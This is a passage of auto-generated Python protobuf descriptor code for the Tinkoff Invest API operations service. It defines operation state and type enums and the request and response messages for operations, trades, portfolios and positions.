\x12\'\n#OPERATION_TYPE_BOND_TAX_PROGRESSIVE\x10!\x12+\n\'OPERATION_TYPE_DIVIDEND_TAX_PROGRESSIVE\x10\"\x12*\n&OPERATION_TYPE_BENEFIT_TAX_PROGRESSIVE\x10#\x12-\n)OPERATION_TYPE_TAX_CORRECTION_PROGRESSIVE\x10$\x12\'\n#OPERATION_TYPE_TAX_REPO_PROGRESSIVE\x10%\x12\x1b\n\x17OPERATION_TYPE_TAX_REPO\x10&\x12 \n\x1cOPERATION_TYPE_TAX_REPO_HOLD\x10\'\x12\"\n\x1eOPERATION_TYPE_TAX_REPO_REFUND\x10(\x12,\n(OPERATION_TYPE_TAX_REPO_HOLD_PROGRESSIVE\x10)\x12.\n*OPERATION_TYPE_TAX_REPO_REFUND_PROGRESSIVE\x10*\x12\x1a\n\x16OPERATION_TYPE_DIV_EXT\x10+\x12(\n$OPERATION_TYPE_TAX_CORRECTION_COUPON\x10,2\xf3\x06\n\x11OperationsService\x12\x84\x01\n\rGetOperations\x12\x38.tinkoff.public.invest.api.contract.v1.OperationsRequest\x1a\x39.tinkoff.public.invest.api.contract.v1.OperationsResponse\x12\x81\x01\n\x0cGetPortfolio\x12\x37.tinkoff.public.invest.api.contract.v1.PortfolioRequest\x1a\x38.tinkoff.public.invest.api.contract.v1.PortfolioResponse\x12\x81\x01\n\x0cGetPositions\x12\x37.tinkoff.public.invest.api.contract.v1.PositionsRequest\x1a\x38.tinkoff.public.invest.api.contract.v1.PositionsResponse\x12\x90\x01\n\x11GetWithdrawLimits\x12<.tinkoff.public.invest.api.contract.v1.WithdrawLimitsRequest\x1a=.tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse\x12\x8a\x01\n\x0fGetBrokerReport\x12:.tinkoff.public.invest.api.contract.v1.BrokerReportRequest\x1a;.tinkoff.public.invest.api.contract.v1.BrokerReportResponse\x12\xae\x01\n\x19GetDividendsForeignIssuer\x12G.tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest\x1aH.tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponseBa\n\x1cru.tinkoff.piapi.contract.v1P\x01Z\x0c./;investapi\xa2\x02\x05TIAPI\xaa\x02\x14Tinkoff.InvestApi.V1\xca\x02\x11Tinkoff\\Invest\\V1b\x06proto3'
,
dependencies=[google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,tinkoff_dot_invest_dot_grpc_dot_common__pb2.DESCRIPTOR,])
_OPERATIONSTATE = _descriptor.EnumDescriptor(
name='OperationState',
full_name='tinkoff.public.invest.api.contract.v1.OperationState',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='OPERATION_STATE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_STATE_EXECUTED', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_STATE_CANCELED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=6977,
serialized_end=7086,
)
_sym_db.RegisterEnumDescriptor(_OPERATIONSTATE)
OperationState = enum_type_wrapper.EnumTypeWrapper(_OPERATIONSTATE)
_OPERATIONTYPE = _descriptor.EnumDescriptor(
name='OperationType',
full_name='tinkoff.public.invest.api.contract.v1.OperationType',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_INPUT', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_BOND_TAX', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_OUTPUT_SECURITIES', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_OVERNIGHT', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TAX', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_BOND_REPAYMENT_FULL', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_SELL_CARD', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_DIVIDEND_TAX', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_OUTPUT', index=9, number=9,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_BOND_REPAYMENT', index=10, number=10,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TAX_CORRECTION', index=11, number=11,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_SERVICE_FEE', index=12, number=12,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_BENEFIT_TAX', index=13, number=13,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_MARGIN_FEE', index=14, number=14,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_BUY', index=15, number=15,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_BUY_CARD', index=16, number=16,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_INPUT_SECURITIES', index=17, number=17,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_SELL_MARGIN', index=18, number=18,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_BROKER_FEE', index=19, number=19,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_BUY_MARGIN', index=20, number=20,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_DIVIDEND', index=21, number=21,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_SELL', index=22, number=22,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_COUPON', index=23, number=23,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_SUCCESS_FEE', index=24, number=24,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_DIVIDEND_TRANSFER', index=25, number=25,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_ACCRUING_VARMARGIN', index=26, number=26,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_WRITING_OFF_VARMARGIN', index=27, number=27,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_DELIVERY_BUY', index=28, number=28,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_DELIVERY_SELL', index=29, number=29,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TRACK_MFEE', index=30, number=30,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TRACK_PFEE', index=31, number=31,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TAX_PROGRESSIVE', index=32, number=32,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_BOND_TAX_PROGRESSIVE', index=33, number=33,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_DIVIDEND_TAX_PROGRESSIVE', index=34, number=34,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_BENEFIT_TAX_PROGRESSIVE', index=35, number=35,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TAX_CORRECTION_PROGRESSIVE', index=36, number=36,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TAX_REPO_PROGRESSIVE', index=37, number=37,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TAX_REPO', index=38, number=38,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TAX_REPO_HOLD', index=39, number=39,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TAX_REPO_REFUND', index=40, number=40,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TAX_REPO_HOLD_PROGRESSIVE', index=41, number=41,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TAX_REPO_REFUND_PROGRESSIVE', index=42, number=42,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_DIV_EXT', index=43, number=43,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='OPERATION_TYPE_TAX_CORRECTION_COUPON', index=44, number=44,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=7089,
serialized_end=8640,
)
_sym_db.RegisterEnumDescriptor(_OPERATIONTYPE)
OperationType = enum_type_wrapper.EnumTypeWrapper(_OPERATIONTYPE)
OPERATION_STATE_UNSPECIFIED = 0
OPERATION_STATE_EXECUTED = 1
OPERATION_STATE_CANCELED = 2
OPERATION_TYPE_UNSPECIFIED = 0
OPERATION_TYPE_INPUT = 1
OPERATION_TYPE_BOND_TAX = 2
OPERATION_TYPE_OUTPUT_SECURITIES = 3
OPERATION_TYPE_OVERNIGHT = 4
OPERATION_TYPE_TAX = 5
OPERATION_TYPE_BOND_REPAYMENT_FULL = 6
OPERATION_TYPE_SELL_CARD = 7
OPERATION_TYPE_DIVIDEND_TAX = 8
OPERATION_TYPE_OUTPUT = 9
OPERATION_TYPE_BOND_REPAYMENT = 10
OPERATION_TYPE_TAX_CORRECTION = 11
OPERATION_TYPE_SERVICE_FEE = 12
OPERATION_TYPE_BENEFIT_TAX = 13
OPERATION_TYPE_MARGIN_FEE = 14
OPERATION_TYPE_BUY = 15
OPERATION_TYPE_BUY_CARD = 16
OPERATION_TYPE_INPUT_SECURITIES = 17
OPERATION_TYPE_SELL_MARGIN = 18
OPERATION_TYPE_BROKER_FEE = 19
OPERATION_TYPE_BUY_MARGIN = 20
OPERATION_TYPE_DIVIDEND = 21
OPERATION_TYPE_SELL = 22
OPERATION_TYPE_COUPON = 23
OPERATION_TYPE_SUCCESS_FEE = 24
OPERATION_TYPE_DIVIDEND_TRANSFER = 25
OPERATION_TYPE_ACCRUING_VARMARGIN = 26
OPERATION_TYPE_WRITING_OFF_VARMARGIN = 27
OPERATION_TYPE_DELIVERY_BUY = 28
OPERATION_TYPE_DELIVERY_SELL = 29
OPERATION_TYPE_TRACK_MFEE = 30
OPERATION_TYPE_TRACK_PFEE = 31
OPERATION_TYPE_TAX_PROGRESSIVE = 32
OPERATION_TYPE_BOND_TAX_PROGRESSIVE = 33
OPERATION_TYPE_DIVIDEND_TAX_PROGRESSIVE = 34
OPERATION_TYPE_BENEFIT_TAX_PROGRESSIVE = 35
OPERATION_TYPE_TAX_CORRECTION_PROGRESSIVE = 36
OPERATION_TYPE_TAX_REPO_PROGRESSIVE = 37
OPERATION_TYPE_TAX_REPO = 38
OPERATION_TYPE_TAX_REPO_HOLD = 39
OPERATION_TYPE_TAX_REPO_REFUND = 40
OPERATION_TYPE_TAX_REPO_HOLD_PROGRESSIVE = 41
OPERATION_TYPE_TAX_REPO_REFUND_PROGRESSIVE = 42
OPERATION_TYPE_DIV_EXT = 43
OPERATION_TYPE_TAX_CORRECTION_COUPON = 44
_OPERATIONSREQUEST = _descriptor.Descriptor(
name='OperationsRequest',
full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='account_id', full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest.account_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='from', full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest.from', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='to', full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest.to', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state', full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest.state', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='figi', full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest.figi', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=147,
serialized_end=352,
)
_OPERATIONSRESPONSE = _descriptor.Descriptor(
name='OperationsResponse',
full_name='tinkoff.public.invest.api.contract.v1.OperationsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='operations', full_name='tinkoff.public.invest.api.contract.v1.OperationsResponse.operations', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=354,
serialized_end=444,
)
_OPERATION = _descriptor.Descriptor(
name='Operation',
full_name='tinkoff.public.invest.api.contract.v1.Operation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='tinkoff.public.invest.api.contract.v1.Operation.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parent_operation_id', full_name='tinkoff.public.invest.api.contract.v1.Operation.parent_operation_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='currency', full_name='tinkoff.public.invest.api.contract.v1.Operation.currency', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='payment', full_name='tinkoff.public.invest.api.contract.v1.Operation.payment', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='price', full_name='tinkoff.public.invest.api.contract.v1.Operation.price', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state', full_name='tinkoff.public.invest.api.contract.v1.Operation.state', index=5,
number=6, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity', full_name='tinkoff.public.invest.api.contract.v1.Operation.quantity', index=6,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity_rest', full_name='tinkoff.public.invest.api.contract.v1.Operation.quantity_rest', index=7,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='figi', full_name='tinkoff.public.invest.api.contract.v1.Operation.figi', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='instrument_type', full_name='tinkoff.public.invest.api.contract.v1.Operation.instrument_type', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='date', full_name='tinkoff.public.invest.api.contract.v1.Operation.date', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='tinkoff.public.invest.api.contract.v1.Operation.type', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='operation_type', full_name='tinkoff.public.invest.api.contract.v1.Operation.operation_type', index=12,
number=13, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='trades', full_name='tinkoff.public.invest.api.contract.v1.Operation.trades', index=13,
number=14, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=447,
serialized_end=1006,
)
_OPERATIONTRADE = _descriptor.Descriptor(
name='OperationTrade',
full_name='tinkoff.public.invest.api.contract.v1.OperationTrade',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='trade_id', full_name='tinkoff.public.invest.api.contract.v1.OperationTrade.trade_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='date_time', full_name='tinkoff.public.invest.api.contract.v1.OperationTrade.date_time', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity', full_name='tinkoff.public.invest.api.contract.v1.OperationTrade.quantity', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='price', full_name='tinkoff.public.invest.api.contract.v1.OperationTrade.price', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1009,
serialized_end=1174,
)
_PORTFOLIOREQUEST = _descriptor.Descriptor(
name='PortfolioRequest',
full_name='tinkoff.public.invest.api.contract.v1.PortfolioRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='account_id', full_name='tinkoff.public.invest.api.contract.v1.PortfolioRequest.account_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1176,
serialized_end=1214,
)
_PORTFOLIORESPONSE = _descriptor.Descriptor(
name='PortfolioResponse',
full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='total_amount_shares', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.total_amount_shares', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_amount_bonds', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.total_amount_bonds', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_amount_etf', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.total_amount_etf', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_amount_currencies', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.total_amount_currencies', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_amount_futures', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.total_amount_futures', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='expected_yield', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.expected_yield', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='positions', full_name='tinkoff.public.invest.api.contract.v1.PortfolioResponse.positions', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1217,
serialized_end=1788,
)
_POSITIONSREQUEST = _descriptor.Descriptor(
name='PositionsRequest',
full_name='tinkoff.public.invest.api.contract.v1.PositionsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='account_id', full_name='tinkoff.public.invest.api.contract.v1.PositionsRequest.account_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1790,
serialized_end=1828,
)
_POSITIONSRESPONSE = _descriptor.Descriptor(
name='PositionsResponse',
full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='money', full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse.money', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='blocked', full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse.blocked', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='securities', full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse.securities', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='limits_loading_in_progress', full_name='tinkoff.public.invest.api.contract.v1.PositionsResponse.limits_loading_in_progress', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
